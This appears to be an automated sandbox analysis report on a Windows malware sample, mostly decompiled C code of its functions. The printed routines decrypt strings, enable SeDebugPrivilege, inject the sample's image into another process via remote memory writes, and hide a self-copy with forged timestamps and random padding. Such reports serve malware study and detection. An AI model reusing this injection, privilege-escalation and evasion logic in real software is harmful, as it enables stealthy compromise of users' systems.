SHLWAPI.dllUrlIsNoHistoryW, PathGetArgsW, PathMakePrettyW, wnsprintfW, SHRegSetUSValueA, PathRemoveArgsA, SHQueryInfoKeyA, StrToIntA, PathIsUNCA
KERNEL32.dllWriteConsoleW, CopyFileExW, GetAtomNameA, SetConsoleCursorPosition, OpenSemaphoreW, EnumCalendarInfoExA, IsBadHugeWritePtr, SetConsoleActiveScreenBuffer, CreateDirectoryExA, SetNamedPipeHandleState, VirtualAlloc, VirtualProtect, CreateFileA
ADVAPI32.dllBuildImpersonateExplicitAccessWithNameA, CryptGenRandom, CryptDestroyHash, SetEntriesInAuditListA

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Ue0N2amgcH.exe PID: 6080 Parent PID: 5532

General

Start time:02:58:17
Start date:05/04/2021
Path:C:\Users\user\Desktop\Ue0N2amgcH.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\Ue0N2amgcH.exe'
Imagebase:0x400000
File size:60928 bytes
MD5 hash:CCB2DB4A8A284F62DB7002BE470AC542
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: winlogon.exe PID: 560 Parent PID: 6080

General

Start time:02:58:18
Start date:05/04/2021
Path:C:\Windows\System32\winlogon.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff739090000
File size:677376 bytes
MD5 hash:F9017F2DC455AD373DF036F5817A8870
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: Ue0N2amgcH.exe PID: 6080 Parent PID: 5532 Ue0N2amgcH.exeCOMMON

    Executed Functions

    Function 00409475, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00409475() {
				signed int _v5;
				long _v12;
				short _v532;
				void* __ebx;
				void* _t34;
				void* _t36;
				void* _t38;
				char _t42;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t50;
				int _t53;
				char* _t57;
				void* _t58;
				intOrPtr _t63;
				void* _t65;
				signed int _t66;
				signed int _t71;
				void* _t73;
				void* _t75;
				intOrPtr _t76;
				signed int _t80;
				char* _t84;
				void* _t86;
				signed char* _t90;
				void* _t91;

				 *0x412af8 =  *0x412af8 & 0x00000000;
				_t34 = E00408A16();
				if(_t34 != 0) {
					 *0x4129ec =  *0x4129ec | 0xffffffff;
					 *0x412bac = E00409909(E004093CD); // executed
					_t36 = HeapCreate(0, 0x80000, 0); // executed
					 *0x413e5c = _t36;
					if(_t36 != 0) {
						 *0x412707 = 1;
					} else {
						 *0x413e5c = GetProcessHeap();
						 *0x412707 = 0;
					}
					E004105E8();
					 *0x412e5c = 0;
					 *0x41272e = 0;
					_t38 = RtlAllocateHeap( *0x413e5c, 8, 0x184);
					 *0x412a64 = _t38;
					if(_t38 != 0) {
						_v12 = 0;
						while(1) {
							_t71 = (_v12 & 0x0000ffff) << 2;
							_t41 = ( *( *(_t71 + 0x412020)) & 0x000000ff) + 1;
							if(( *( *(_t71 + 0x412020)) & 0x000000ff) + 1 == 0) {
								break;
							}
							_t84 = E0040CF2D(_t41);
							if(_t84 == 0) {
								break;
							} else {
								_t90 =  *(_t71 + 0x412020);
								_v5 = 0;
								if( *_t90 > 0) {
									_t66 = 0;
									_t73 = 0xba;
									do {
										_v5 = _v5 + 1;
										 *((char*)(_t66 + _t84)) = ( &(_t90[1]))[_t66] + _t73;
										_t66 = _v5 & 0x000000ff;
										_t73 = _t73 + 2;
									} while (_t66 <  *_t90);
								}
								 *((char*)((_v5 & 0x000000ff) + _t84)) = 0;
								if( *_t84 != 0x57) {
									_t45 =  *0x412a64; // 0x246f5a8
									 *((intOrPtr*)(_t45 + _t71)) = _t84 + 1;
									goto L17;
								} else {
									_t15 = _t84 + 1; // 0x1
									_t63 = E0040D379(( *( *(_t71 + 0x412020)) & 0x000000ff) - 1, _t15);
									_t75 =  *0x412a64; // 0x246f5a8
									 *((intOrPtr*)(_t75 + _t71)) = _t63;
									E0040CF40(_t84);
									_t65 =  *0x412a64; // 0x246f5a8
									if( *((intOrPtr*)(_t65 + _t71)) != 0) {
										L17:
										_v12 = _v12 + 1;
										if(_v12 < 0x60) {
											continue;
										} else {
											_t46 = GetCurrentProcessId();
											_t76 =  *0x412bac; // 0x400000
											 *0x412ba0 = _t46;
											_t22 = _t76 + 0x3c; // 0x120
											_t48 =  *_t22 + _t76;
											_t80 =  *(_t48 + 6) & 0x0000ffff;
											_t91 = 0;
											if(_t80 > 0) {
												_t86 = 3;
												if(_t86 < _t80) {
													_t58 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x90;
													_t91 =  *((intOrPtr*)(_t58 + 0xc)) + _t76;
													if(IsBadHugeReadPtr(_t91,  *(_t58 + 8)) != 0) {
														_t91 = 0;
													}
												}
											}
											 *0x412a8c = _t91;
											 *0x412a78 =  *0x412c98(); // executed
											_t50 = E0040F0FC(L"SeDebugPrivilege"); // executed
											if(_t50 == 0) {
												 *0x412af8 =  *0x412af8 | 0x00000001;
											}
											_v12 = 0x103;
											_t53 = GetUserNameW( &_v532,  &_v12); // executed
											if(_t53 == 0) {
												L26:
												 *0x4129e8 = "-";
											} else {
												_t57 = E0040CF93( &_v532, _v12 + _v12);
												 *0x4129e8 = _t57;
												if(_t57 == 0) {
													goto L26;
												}
											}
											_t42 = 1;
										}
									} else {
										break;
									}
								}
							}
							L28:
							goto L29;
						}
						_t42 = 0;
						goto L28;
					} else {
						_t42 = 0;
					}
					L29:
					return _t42;
				} else {
					return _t34;
				}
			}






























    0x00409478
    0x00409485
    0x0040948c
    0x00409490
    0x004094ac
    0x004094b1
    0x004094b7
    0x004094be
    0x004094d4
    0x004094c0
    0x004094c6
    0x004094cb
    0x004094cb
    0x004094db
    0x004094ed
    0x004094f3
    0x004094fa
    0x00409500
    0x00409507
    0x00409510
    0x00409514
    0x00409518
    0x00409524
    0x00409525
    0x00000000
    0x00000000
    0x0040952c
    0x00409530
    0x00000000
    0x00409532
    0x00409532
    0x0040953b
    0x0040953f
    0x00409541
    0x00409543
    0x00409545
    0x0040954b
    0x0040954e
    0x00409551
    0x00409558
    0x0040955b
    0x00409545
    0x00409563
    0x0040956a
    0x004095a0
    0x004095a6
    0x00000000
    0x0040956c
    0x00409575
    0x0040957a
    0x0040957f
    0x00409586
    0x00409589
    0x0040958e
    0x00409597
    0x004095a9
    0x004095a9
    0x004095b1
    0x00000000
    0x004095b7
    0x004095b7
    0x004095bd
    0x004095c3
    0x004095c8
    0x004095cb
    0x004095cd
    0x004095d1
    0x004095d6
    0x004095da
    0x004095de
    0x004095e4
    0x004095f1
    0x004095fc
    0x004095fe
    0x004095fe
    0x004095fc
    0x004095de
    0x00409600
    0x00409611
    0x00409617
    0x0040961e
    0x00409620
    0x00409620
    0x00409632
    0x00409639
    0x00409641
    0x0040965e
    0x0040965e
    0x00409643
    0x00409650
    0x00409655
    0x0040965c
    0x00000000
    0x00000000
    0x0040965c
    0x00409668
    0x00409668
    0x00000000
    0x00000000
    0x00000000
    0x00409597
    0x0040956a
    0x0040966a
    0x00000000
    0x0040966a
    0x00409599
    0x00000000
    0x00409509
    0x00409509
    0x00409509
    0x0040966b
    0x0040966e
    0x0040948f
    0x0040948f
    0x0040948f

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 004094B1
    • GetProcessHeap.KERNEL32 ref: 004094C0
    • RtlAllocateHeap.NTDLL(00000008,00000184), ref: 004094FA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Heap$AllocateCreateProcess
    • String ID: SeDebugPrivilege$`
    • API String ID: 3901675031-4146895512
    • Opcode ID: 291f9c010bc795d013228392d3dc50e08bda455651a36e092512f83fb44b98a1
    • Instruction ID: e57fa5d3d93a770b57eb5b91877c2a6989448357b630b411715358be4720e600
    • Opcode Fuzzy Hash: 291f9c010bc795d013228392d3dc50e08bda455651a36e092512f83fb44b98a1
    • Instruction Fuzzy Hash: CF512330504211AFDB218F65ED847EA7BA5EF11308F0480BBE840E72E3D7B98A55CB6C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406689, Relevance: 12.2, APIs: 8, Instructions: 152memoryinjectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00406689(void* _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				void* _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t67;
				void* _t77;
				long _t81;
				intOrPtr* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t91;
				intOrPtr _t93;
				unsigned int _t95;
				signed int _t97;
				void* _t103;
				long _t105;
				void* _t106;
				long* _t107;
				void* _t109;
				void* _t111;

				_t86 =  *0x412bac; // 0x400000
				_t1 = _t86 + 0x3c; // 0x120
				_t111 =  *_t1 + _t86;
				_v24 = _t86;
				_t61 = VirtualAllocEx(_a4,  *(_t111 + 0x34),  *(_t111 + 0x50), 0x2000, 1); // executed
				_v8 = _t61;
				if(_t61 != 0) {
					L3:
					_t62 =  *(_t111 + 0x50);
					if( *(_t111 + 0x50) == 0) {
						L2:
						return 0;
					}
					_t64 = E0040CF2D(_t62);
					_v20 = _t64;
					if(_t64 == 0) {
						goto L2;
					}
					E0040CF7C(_t64, _t86,  *(_t111 + 0x50));
					_t66 =  *((intOrPtr*)(_t111 + 0xa0));
					if(_t66 == 0 ||  *((intOrPtr*)(_t111 + 0xa4)) == 0) {
						L16:
						_t105 =  *(_t111 + 0x54);
						_t67 = VirtualAllocEx(_a4, _v8, _t105, 0x1000, 4); // executed
						if(_t67 == 0) {
							goto L2;
						}
						WriteProcessMemory(_a4, _v8, _t86, _t105, 0); // executed
						VirtualProtectEx(_a4, _v8, _t105, 2,  &_v16); // executed
						_v12 = _v12 & 0x00000000;
						_t106 = ( *(_t111 + 0x14) & 0x0000ffff) + _t111 + 0x18;
						if(0 >=  *(_t111 + 6)) {
							L21:
							E0040CF40(_v20);
							return _v8;
						}
						_t107 = _t106 + 8;
						while(1) {
							_t77 = VirtualAllocEx(_a4, _v8 + _t107[1],  *_t107, 0x1000, 4); // executed
							_t87 = _t77;
							if(_t87 == 0) {
								goto L2;
							}
							WriteProcessMemory(_a4, _t87, _t107[1] + _v20,  *_t107, 0); // executed
							_t81 = 0x40;
							_v16 = _t81;
							VirtualProtectEx(_a4, _t87,  *_t107, _t81,  &_v16); // executed
							_t107 =  &(_t107[0xa]);
							_v12 = _v12 + 1;
							if(_v12 < ( *(_t111 + 6) & 0x0000ffff)) {
								continue;
							}
							goto L21;
						}
						goto L2;
					} else {
						_t91 =  *(_t111 + 0x34);
						_t103 = _v8 - _t91;
						_t109 = _t86 - _t91;
						_t84 = _t66 + _v20;
						while( *_t84 != 0) {
							_t93 =  *((intOrPtr*)(_t84 + 4));
							if(_t93 < 8) {
								L14:
								_t84 = _t84 +  *((intOrPtr*)(_t84 + 4));
								continue;
							}
							_t95 = _t93 + 0xfffffff8 >> 1;
							_v16 = _t95;
							_v12 = 0;
							if(_t95 == 0) {
								goto L14;
							} else {
								goto L10;
							}
							do {
								L10:
								_t97 =  *(_t84 + 8 + _v12 * 2) & 0x0000ffff;
								if(_t97 != 0) {
									 *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) =  *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) + _t103 - _t109;
								}
								_v12 = _v12 + 1;
							} while (_v12 < _v16);
							_t86 = _v24;
							goto L14;
						}
						goto L16;
					}
				}
				_t85 = VirtualAllocEx(_a4, _t61,  *(_t111 + 0x50), 0x2000, 1); // executed
				_v8 = _t85;
				if(_t85 != 0) {
					goto L3;
				}
				goto L2;
			}




























    0x00406690
    0x00406697
    0x004066a3
    0x004066a8
    0x004066b1
    0x004066b7
    0x004066bc
    0x004066dc
    0x004066dc
    0x004066e1
    0x004066d5
    0x00000000
    0x004066d5
    0x004066e3
    0x004066e8
    0x004066ed
    0x00000000
    0x00000000
    0x004066f4
    0x004066f9
    0x00406701
    0x0040676c
    0x0040676c
    0x0040677d
    0x00406785
    0x00000000
    0x00000000
    0x00406795
    0x004067a8
    0x004067b2
    0x004067b6
    0x004067c0
    0x00406823
    0x00406826
    0x00000000
    0x0040682b
    0x004067c2
    0x004067c5
    0x004067d8
    0x004067de
    0x004067e2
    0x00000000
    0x00000000
    0x004067f7
    0x004067ff
    0x00406805
    0x0040680e
    0x00406818
    0x0040681b
    0x00406821
    0x00000000
    0x00000000
    0x00000000
    0x00406821
    0x00000000
    0x0040670c
    0x0040670c
    0x00406714
    0x00406716
    0x0040671b
    0x00406767
    0x0040671f
    0x00406725
    0x00406764
    0x00406764
    0x00000000
    0x00406764
    0x0040672a
    0x0040672c
    0x0040672f
    0x00406736
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406738
    0x00406738
    0x0040673b
    0x00406743
    0x00406754
    0x00406754
    0x00406756
    0x0040675c
    0x00406761
    0x00000000
    0x00406761
    0x00000000
    0x00406767
    0x00406701
    0x004066c8
    0x004066ce
    0x004066d3
    0x00000000
    0x00000000
    0x00000000

    APIs
    • VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,?), ref: 004066B1
    • VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,?), ref: 004066C8
    • VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,?), ref: 0040677D
    • WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,?), ref: 00406795
    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?,?,?), ref: 004067A8
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,?), ref: 004067D8
    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,?), ref: 004067F7
    • VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,?,?,?), ref: 0040680E
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Alloc$MemoryProcessProtectWrite
    • String ID:
    • API String ID: 426431698-0
    • Opcode ID: d768156162df72b3616f17d480a812c65aab4c8ee0314080ba2cf48f3fc17398
    • Instruction ID: 671572708ff2695cd44bb262c6223c739609e082facb42a51842ca87b1629f13
    • Opcode Fuzzy Hash: d768156162df72b3616f17d480a812c65aab4c8ee0314080ba2cf48f3fc17398
    • Instruction Fuzzy Hash: CC518E71A00209FFDB119F94CD84FAEBBB5FF44748F118029F502AB6A0D775A960DB18
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405808, Relevance: 7.5, APIs: 5, Instructions: 49processstringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00405808() {
				short _v524;
				intOrPtr _v552;
				void* _v560;
				void* _t10;
				struct tagPROCESSENTRY32W* _t11;
				int _t19;
				signed short _t20;
				intOrPtr _t21;
				void* _t22;
				signed short _t24;

				_t20 = 0;
				_v560 = 0x22c;
				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
				_t22 = _t10;
				_t11 =  &_v560;
				Process32FirstW(_t22, _t11); // executed
				if(_t11 != 0) {
					do {
						_t24 = 0;
						if(_v552 != 0) {
							while(1) {
								_t21 =  *0x412a64; // 0x246f5a8
								_t19 = lstrcmpiW( &_v524,  *(_t21 + ( *(0x401a04 + (_t24 & 0x0000ffff) * 2) & 0x0000ffff) * 4)); // executed
								if(_t19 == 0) {
									break;
								}
								_t24 = _t24 + 1;
								if(_t24 < 2) {
									continue;
								} else {
								}
								goto L7;
							}
							_t20 = 1;
						}
						L7:
					} while (Process32NextW(_t22,  &_v560) != 0);
				}
				FindCloseChangeNotification(_t22); // executed
				return _t20;
			}













    0x00405817
    0x00405819
    0x00405823
    0x00405829
    0x0040582b
    0x00405833
    0x0040583b
    0x0040583e
    0x0040583e
    0x00405846
    0x00405848
    0x00405848
    0x00405863
    0x0040586b
    0x00000000
    0x00000000
    0x0040586d
    0x00405872
    0x00000000
    0x00000000
    0x00405874
    0x00000000
    0x00405872
    0x00405876
    0x00405876
    0x00405878
    0x00405886
    0x0040588a
    0x0040588c
    0x00405897

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405823
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00405833
    • lstrcmpiW.KERNELBASE(?,0246F5A8,?,?,00000000), ref: 00405863
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00405880
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 0040588C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
    • String ID:
    • API String ID: 545148253-0
    • Opcode ID: 9357cc00b5358a273a8b6434f4b0c663d109436b9335d0f8ea867cd90425e417
    • Instruction ID: bf89a223184001ba136491f712bac1afb94fed6ecbb59cfac22fa003c3c655c8
    • Opcode Fuzzy Hash: 9357cc00b5358a273a8b6434f4b0c663d109436b9335d0f8ea867cd90425e417
    • Instruction Fuzzy Hash: F1017532601118ABD7216B71ED4DBFF77BCEB45741F108076E801E21A0E674C965CF68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F0FC, Relevance: 7.5, APIs: 5, Instructions: 42COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F0FC(WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _t9;
				int _t13;
				int _t16;
				long _t19;

				_t9 =  *0x4129ec; // 0xffffffff
				_t19 = 0;
				if(OpenProcessToken(_t9, 0x28,  &_v8) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					_t13 = LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					if(_t13 != 0) {
						_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0); // executed
						if(_t16 != 0 && GetLastError() == 0) {
							_t19 = 1;
						}
					}
					FindCloseChangeNotification(_v8); // executed
				}
				return _t19;
			}










    0x0040f0ff
    0x0040f10f
    0x0040f119
    0x0040f122
    0x0040f12a
    0x0040f131
    0x0040f139
    0x0040f147
    0x0040f14f
    0x0040f15b
    0x0040f15b
    0x0040f14f
    0x0040f160
    0x0040f160
    0x0040f16a

    APIs
    • OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040961C,SeDebugPrivilege), ref: 0040F111
    • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 0040F131
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0040F147
    • GetLastError.KERNEL32 ref: 0040F151
    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040F160
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorFindLastLookupNotificationOpenPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 1669889876-0
    • Opcode ID: 8ffefae96f612d502892da737631cf4df35e726e6f624f484a82ce5858d57198
    • Instruction ID: a4c96a2da6c2e1322850cf4be798d752422cfab52bbfbec5e57f1cff82fb6d85
    • Opcode Fuzzy Hash: 8ffefae96f612d502892da737631cf4df35e726e6f624f484a82ce5858d57198
    • Instruction Fuzzy Hash: 2B01FF71600109EFEB209FA5DD89AEF77BDEB04784F004035B505E5290E7B49E149B64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004093CD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004093CD(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t10;
				void* _t12;
				signed short _t16;
				CHAR** _t17;
				struct HINSTANCE__* _t18;

				_t12 = __edx; // executed
				_t6 = LoadLibraryA(__ecx); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					L4:
					return _t18;
				}
				_t16 = 0;
				if(0 >= _a4) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t17 = _t12 + (_t16 & 0x0000ffff) * 8;
					_t10 = GetProcAddress(_t18,  *_t17);
					if(_t10 == 0) {
						break;
					}
					_t16 = _t16 + 1;
					 *(_t17[1]) = _t10;
					if(_t16 < _a4) {
						continue;
					}
					goto L4;
				}
				return 0;
			}









    0x004093d2
    0x004093d4
    0x004093da
    0x004093de
    0x0040940b
    0x00000000
    0x0040940b
    0x004093e2
    0x004093e9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004093eb
    0x004093eb
    0x004093ee
    0x004093f4
    0x004093fc
    0x00000000
    0x00000000
    0x00409401
    0x00409402
    0x00409409
    0x00000000
    0x00000000
    0x00000000
    0x00409409
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(kernel32.dll), ref: 004093D4
    • GetProcAddress.KERNELBASE(00000000), ref: 004093F4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: kernel32.dll
    • API String ID: 2574300362-1793498882
    • Opcode ID: 537b4c57a40e628cd78d5274c451dd8f8f39061c96c2c4521d1963abea68c647
    • Instruction ID: 589cceb3c227e5a1be29c681a73e1a78987006d7dcae856c58f6ba6b963a2b81
    • Opcode Fuzzy Hash: 537b4c57a40e628cd78d5274c451dd8f8f39061c96c2c4521d1963abea68c647
    • Instruction Fuzzy Hash: BDF0A7313082156BC7219F65AD44477B799EBC5741301483AF942E3192EA758C53D67C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405898, Relevance: 40.8, APIs: 27, Instructions: 307synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v5;
				int _v12;
				signed int _v13;
				long _v20;
				void* _v24;
				char _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				short _v572;
				short _v1092;
				void* _t76;
				intOrPtr _t78;
				void* _t79;
				signed int _t80;
				signed int _t83;
				intOrPtr _t84;
				intOrPtr _t90;
				signed int _t95;
				signed int _t98;
				void* _t101;
				signed int _t105;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t108;
				void* _t119;
				signed int _t122;
				intOrPtr _t125;
				void* _t129;
				long _t142;
				intOrPtr _t150;
				void* _t151;
				intOrPtr _t154;
				intOrPtr _t156;
				intOrPtr _t158;
				signed int _t159;
				void* _t164;
				signed int _t165;
				signed int _t172;
				void* _t174;
				void* _t175;
				intOrPtr _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t181;

				_t177 = __esi;
				E0040664A(); // executed
				_t76 = E00409475(); // executed
				if(_t76 == 0) {
					return 0;
				}
				_v12 = 0;
				_t172 = GetCommandLineA();
				__eflags = _t172;
				if(_t172 == 0) {
					L11:
					_t78 =  *0x412a64; // 0x246f5a8
					_t79 = CreateMutexW(0x413468, 1,  *(_t78 + 0x30)); // executed
					_v24 = _t79;
					_t80 = GetLastError();
					__eflags = _t80;
					if(_t80 != 0) {
						L48:
						__eflags = _v24;
						if(_v24 != 0) {
							CloseHandle(_v24);
						}
						E0040FB22(_t170, _t172);
						ExitProcess(0);
					}
					_t83 = E00405808(); // executed
					_v5 = _t83;
					_t84 =  *0x412a64; // 0x246f5a8
					_v20 = 0;
					_v13 = 0;
					__eflags = E00409241( *((intOrPtr*)(_t84 + 0x2c)));
					if(__eflags == 0) {
						L23:
						_push(_t177);
						GetModuleFileNameW(0,  &_v1092, 0x104);
						E0040966F( &_v572);
						_t90 =  *0x412a64; // 0x246f5a8
						PathCombineW( &_v572,  &_v572,  *(_t90 + 0xc));
						_t95 = lstrcmpiW( &_v1092,  &_v572);
						__eflags = _t95;
						_push( &_v572);
						if(_t95 == 0) {
							_v5 = 0;
							E00409B88();
							L38:
							__eflags = _v5;
							if(_v5 == 0) {
								_t98 =  *0x412af8; // 0x0
								_t170 =  *0x412a64; // 0x246f5a8
								_t101 = E00409968( *((intOrPtr*)(_t170 + (_t98 & 0x00000001 | 0x00000002) * 8))); // executed
								_t174 = _t101;
								_t178 = E0040605C;
								while(1) {
									_t105 = E00406DC4(0, _t170, _t178 -  *0x412bac, _t174); // executed
									__eflags = _t105;
									if(_t105 != 0) {
										break;
									}
									Sleep(0x14); // executed
								}
								while(1) {
									_t106 =  *0x412a64; // 0x246f5a8
									_t107 = E00409241( *((intOrPtr*)(_t106 + 0x28)));
									__eflags = _t107;
									if(_t107 != 0) {
										break;
									}
									Sleep(0x14);
								}
								L47:
								goto L48;
							}
							__eflags = _v13;
							if(__eflags != 0) {
								_t108 =  *0x412a64; // 0x246f5a8
								E00409266(__eflags,  *((intOrPtr*)(_t108 + 0x2c)), 0xa, 0, 0, 0, 0);
							}
							goto L47;
						}
						E00409B88(); // executed
						E0040DD3C( &_v572);
						CopyFileW( &_v1092,  &_v572, 0); // executed
						SetFileAttributesW( &_v572, 0x26); // executed
						_t119 = CreateFileW( &_v572, 0x40000000, 1, 0, 3, 0, 0); // executed
						_v12 = _t119;
						__eflags = _t119 - 0xffffffff;
						if(_t119 == 0xffffffff) {
							L36:
							SetFileAttributesW( &_v572, 0x21); // executed
							goto L38;
						}
						_t122 = SetFilePointer(_t119, 0, 0, 2); // executed
						__eflags = _t122;
						if(_t122 == 0) {
							L33:
							 *0x412a6c(0,  &_v1092, 0x25, 1);
							_t125 =  *0x412a64; // 0x246f5a8
							PathCombineW( &_v1092,  &_v1092,  *(_t125 + 0x5c));
							_t129 = CreateFileW( &_v1092, 0x80000000, 3, 0, 3, 0, 0); // executed
							_t180 = _t129;
							__eflags = _t180 - 0xffffffff;
							if(_t180 != 0xffffffff) {
								GetFileTime(_t180,  &_v36,  &_v52,  &_v44);
								SetFileTime(_v12,  &_v36,  &_v52,  &_v44); // executed
								FindCloseChangeNotification(_t180); // executed
							}
							CloseHandle(_v12);
							goto L36;
						}
						_t142 = E0040DF51(0x400, 0x40) << 9;
						_v20 = _t142;
						__eflags = _t142;
						if(_t142 == 0) {
							_t175 = 0;
							__eflags = 0;
						} else {
							_t175 = E0040CF2D(_t142);
							_t142 = _v20;
						}
						__eflags = _t175;
						if(_t175 == 0) {
							goto L33;
						} else {
							_t181 = 0;
							__eflags = _t142;
							if(_t142 <= 0) {
								L32:
								_t170 =  &_v20;
								WriteFile(_v12, _t175, _t142,  &_v20, 0); // executed
								FlushFileBuffers(_v12);
								E0040CF40(_t175);
								goto L33;
							} else {
								goto L31;
							}
							do {
								L31:
								 *((char*)(_t181 + _t175)) = E0040DF51(E0040DF51(0xff, 1), 0);
								_t142 = _v20;
								_t181 = _t181 + 1;
								__eflags = _t181 - _t142;
							} while (_t181 < _t142);
							goto L32;
						}
					}
					_t150 =  *0x412a64; // 0x246f5a8
					_t151 = E00409266(__eflags,  *((intOrPtr*)(_t150 + 0x2c)), 1, 0, 0, 0, 0);
					__eflags = _v12 & 0x00000001;
					if(__eflags != 0) {
						L16:
						_t154 =  *0x412a64; // 0x246f5a8
						_v12 = 0;
						E00409266(__eflags,  *((intOrPtr*)(_t154 + 0x2c)), 0xb,  &_v12,  &_v20, 0, 0);
						_t156 =  *0x412a64; // 0x246f5a8
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						__eflags = _v5;
						if(__eflags == 0) {
							_push(3);
							_push( *((intOrPtr*)(_t156 + 0x2c)));
							E00409266(__eflags);
							while(1) {
								_t158 =  *0x412a64; // 0x246f5a8
								_t159 = E00409241( *((intOrPtr*)(_t158 + 0x2c)));
								__eflags = _t159;
								if(_t159 == 0) {
									break;
								}
								Sleep(0x14);
							}
							L21:
							_v13 = 1;
							__eflags = _v12;
							if(_v12 != 0) {
								E0040DD3C(_v12);
								E0040CF40(_v12);
							}
							goto L23;
						}
						_push(9);
						_push( *((intOrPtr*)(_t156 + 0x2c)));
						E00409266(__eflags);
						goto L21;
					}
					__eflags = _t151 - 0x1020500;
					if(__eflags < 0) {
						goto L16;
					}
					CloseHandle(_v24);
					ExitProcess(0);
				} else {
					_t164 = E0040D3C6(_t172);
					_t170 =  &_v28;
					_t165 = E0040D20F(_t164,  &_v28, _t172);
					__eflags = _t165;
					if(_t165 <= 0) {
						goto L11;
					}
					_t176 = _v28;
					_t172 = 0;
					__eflags = _t165;
					if(_t165 <= 0) {
						L10:
						E0040CF5C(_t165, _t176);
						goto L11;
					} else {
						goto L5;
					}
					do {
						L5:
						_t170 =  *((intOrPtr*)(_t176 + _t172 * 4));
						__eflags =  *_t170 - 0x2d;
						if( *_t170 == 0x2d) {
							__eflags =  *((char*)(_t170 + 1)) - 0x66;
							if( *((char*)(_t170 + 1)) == 0x66) {
								__eflags =  *(_t170 + 2);
								if( *(_t170 + 2) == 0) {
									_t8 =  &_v12;
									 *_t8 = _v12 | 0x00000001;
									__eflags =  *_t8;
								}
							}
						}
						_t172 = _t172 + 1;
						__eflags = _t172 - _t165;
					} while (_t172 < _t165);
					goto L10;
				}
			}

















































    0x00405898
    0x004058a1
    0x004058a6
    0x004058ad
